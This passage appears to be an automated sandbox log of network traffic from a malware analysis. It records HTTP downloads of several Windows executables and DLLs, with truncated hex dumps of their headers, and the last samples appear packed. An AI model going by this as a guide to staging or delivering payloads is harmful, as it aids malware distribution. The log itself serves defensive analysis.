00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 06:38:24 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 03 Jul 2024 05:30:46 GMTConnection: keep-aliveETag: "6684e206-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6e cb 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f8 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 f7 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 69 71 76 67 63 6b 6d 00 50 1a 00 00 b0 31 00 00 4a 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6d 74 71 76 6a 71 61 00 10 00 00 00 00 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 06:38:34 GMTContent-Type: application/octet-streamContent-Length: 2523648Last-Modified: Wed, 03 Jul 2024 04:16:16 GMTConnection: keep-aliveETag: "6684d090-268200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 c8 e8 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 e0 9c 00 77 0c 00 00 98 ec 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 